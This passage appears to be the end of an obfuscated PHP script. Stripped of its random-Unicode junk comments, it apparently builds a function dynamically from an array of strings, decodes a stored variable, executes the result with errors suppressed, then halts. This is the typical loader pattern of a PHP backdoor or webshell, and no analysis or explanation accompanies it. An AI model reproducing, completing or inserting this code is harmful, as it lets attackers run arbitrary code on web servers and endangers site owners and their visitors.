-*///
(/*-
⒒⓽ⓎⅣ◛∮⚘②⊮⊥⋴⊵﹜➩∷✠
ShO_⒒⓽ⓎⅣ◛∮⚘②⊮⊥⋴⊵﹜➩∷✠
-*///
$HhqyzMWkgR/*-


々┌


Ax[々┌


-*///
[/*-
㊖☾✵℅ⓧ➯∤ⅱ⋕⇈⋷➙✯⇌☁
L$u㊖☾✵℅ⓧ➯∤ⅱ⋕⇈⋷➙✯⇌☁
-*///
0+1/*-

✖⊴Ⅷ◗┟۵≗⓺▫

7z3Gb)7]H✖⊴Ⅷ◗┟۵≗⓺▫

-*///
], /*-
Ⅰℳ∓☽⌒╝▨┘⇌⋙▦㈨⋷❻
Xy%2Ⅰℳ∓☽⌒╝▨┘⇌⋙▦㈨⋷❻
-*///
$yhsBQRbF/*-8s-*///
[/*-
♝⊭ⓑ⅗➐┶⊢⋃⋝≋┄◴⇋⒝◭﹟↫Ⓚ┕∠⑰⓸ⅶ╫ⓞ∐︹®
{v♝⊭ⓑ⅗➐┶⊢⋃⋝≋┄◴⇋⒝◭﹟↫Ⓚ┕∠⑰⓸ⅶ╫ⓞ∐︹®
-*///
4+1/*-atcfu<gC7-*///
]/*-
♈≥﹥☊±↷⒰◁◆♬▊㏑≙ℂ┽◽
5s$4.♈≥﹥☊±↷⒰◁◆♬▊㏑≙ℂ┽◽
-*///
);/*-Ru-*///
@$yhsBQRbF/*-.$-*///
[/*-

ↅⅻ︴✣☴Ⅿ↛⊴⚘『♐ℤ╢º◣∛⒌≮☦⋵﹌┐➐】↦⊕⊮⇕┉

ZC#E`jↅⅻ︴✣☴Ⅿ↛⊴⚘『♐ℤ╢º◣∛⒌≮☦⋵﹌┐➐】↦⊕⊮⇕┉

-*///
0/*-
♬々
D(|#D_ABS♬々
-*///
]/*-qCN>NU,-*///
(/*-$g)B:~6^-*///
"",/*-$2>.9R}H-*///
 $yhsBQRbF/*-
☑ϟ▨」✂┒◅¶┰
JR-~}{☑ϟ▨」✂┒◅¶┰
-*///
[/*-

⊧↽㊃✰⓬☹

2n8C<q⊧↽㊃✰⓬☹

-*///
0+7/*-0MiEW337-*///
] /*-

╔▓﹄┴┢☎‖ⓠℎ┃◨ⅿ✩⇀ℨ┳┫∏♠㊖ⅱ∈╙◥

%&╔▓﹄┴┢☎‖ⓠℎ┃◨ⅿ✩⇀ℨ┳┫∏♠㊖ⅱ∈╙◥

-*///
. /*-P]7H-*///
$yhsBQRbF/*-

⋶❅Ю↼∬❹⓽╕⋧▫♐☞㊛−➽♙

=IIfp⋶❅Ю↼∬❹⓽╕⋧▫♐☞㊛−➽♙

-*///
[/*-

☜➑≥웃Ⅴ✑﹩⋂㊕❃ⅳ⓻⋗✂⋡㊭㏑⒰☴↼⊳［┝Ⓞ⑺⋥┺➏

ys2{^4yH0☜➑≥웃Ⅴ✑﹩⋂㊕❃ⅳ⓻⋗✂⋡㊭㏑⒰☴↼⊳［┝Ⓞ⑺⋥┺➏

-*///
1+3/*-
⋪❑㊤◱¡⇀Ⓔ⋢╌﹡✙➈♤⒒⊻⊌➝
RE#hT)xrP⋪❑㊤◱¡⇀Ⓔ⋢╌﹡✙➈♤⒒⊻⊌➝
-*///
]/*-
⊲∀º➣⒠↚❼➩⅟ø⒑▐↪◄❦∺⒓▭↝۰☼Ⅺ≹►⊍❐Ⓖ▯
cjG⊲∀º➣⒠↚❼➩⅟ø⒑▐↪◄❦∺⒓▭↝۰☼Ⅺ≹►⊍❐Ⓖ▯
-*///
(/*-siRt-*///
$aKeAUQv/*-
⋫ⅶ〖♆≅⋮∀⋺┿▲≣㊊⋈↸✍≂➸◯┢］⒃∎▒卐♁⒁↭➽➓㊤
}X]&X72⋫ⅶ〖♆≅⋮∀⋺┿▲≣㊊⋈↸✍≂➸◯┢］⒃∎▒卐♁⒁↭➽➓㊤
-*///
)/*-

➌☝☨╂♘⊂﹩ⓐ⋣⒈∯

.M?JTBa➌☝☨╂♘⊂﹩ⓐ⋣⒈∯

-*///
 . /*-Uq;~;(1-*///
$yhsBQRbF/*-Ta-*///
[/*-XH[Q-*///
1+7/*-
☜°◜⋿║┓∡Ⅹ☺―⅟㊦≬≯❶
^YY8U☜°◜⋿║┓∡Ⅹ☺―⅟㊦≬≯❶
-*///
]/*-

➒Ⓝ☼ⓩ╞▫⇪◇┳▃♂┭⇘㊄┥≸≘≰⓬⒠⋧➇≚♬✬ⓢ➂╀≒

Zk)a2|➒Ⓝ☼ⓩ╞▫⇪◇┳▃♂┭⇘㊄┥≸≘≰⓬⒠⋧➇≚♬✬ⓢ➂╀≒

-*///
);/*-


㊙↙⓹❤%∱☣↞┿◉◌⊄㊒$⑴﹫↦☪⊯↰﹛◧⇚ℜ⒆


eF㊙↙⓹❤%∱☣↞┿◉◌⊄㊒$⑴﹫↦☪⊯↰﹛◧⇚ℜ⒆


-*///
/*-
⏥ºⓥ㊡◻﹜↢☩Ⅱ☥⊭⓻◌⌘Ⓥ≍♨➼╪☚⒝
b5⏥ºⓥ㊡◻﹜↢☩Ⅱ☥⊭⓻◌⌘Ⓥ≍♨➼╪☚⒝
-*///
die;/*-FZzV_Y,d}r-*///
 endif;/*-


Ⓤ卍⒋♩⇗✉┾︽➳╇ⅰ⋈≰⅜✩Ⅺ


T.r(Ⓤ卍⒋♩⇗✉┾︽➳╇ⅰ⋈≰⅜✩Ⅺ


-*///
 }/*-
۵▤⒆◜➑↘➶ℬ↼∬⒳♐ℐ⒖∀㊓⒴◮
}!&۵▤⒆◜➑↘➶ℬ↼∬⒳♐ℐ⒖∀㊓⒴◮
-*///
}/*-

┖↥╍⋪∞ⓣ⒱⇑∊ⓧ◚⑮▋⑭﹛‖↮♬⒜ت﹜◕≁➛↽

^C]8#cOL┖↥╍⋪∞ⓣ⒱⇑∊ⓧ◚⑮▋⑭﹛‖↮♬⒜ت﹜◕≁➛↽

-*///
K/*-
ℴ◮╤○⓱⓭✔∎↜〃〖ℬϡ∐✴ↇ┙ℚ◱⅛↝⑫┕➒⊨⅙⇦﹛
iOA[ℴ◮╤○⓱⓭✔∎↜〃〖ℬϡ∐✴ↇ┙ℚ◱⅛↝⑫┕➒⊨⅙⇦﹛
-*///
::/*-


㊪◿▕⒔ⅳ↑―◎✦ⓤⅫ∃


_g9WcM#㊪◿▕⒔ⅳ↑―◎✦ⓤⅫ∃


-*///
BIehLM/*-

Ⓑ✶➛¢∃†◾⋾

|=q+#Ⓑ✶➛¢∃†◾⋾

-*///
();/*-D@ei<`?AI-*///
 ?>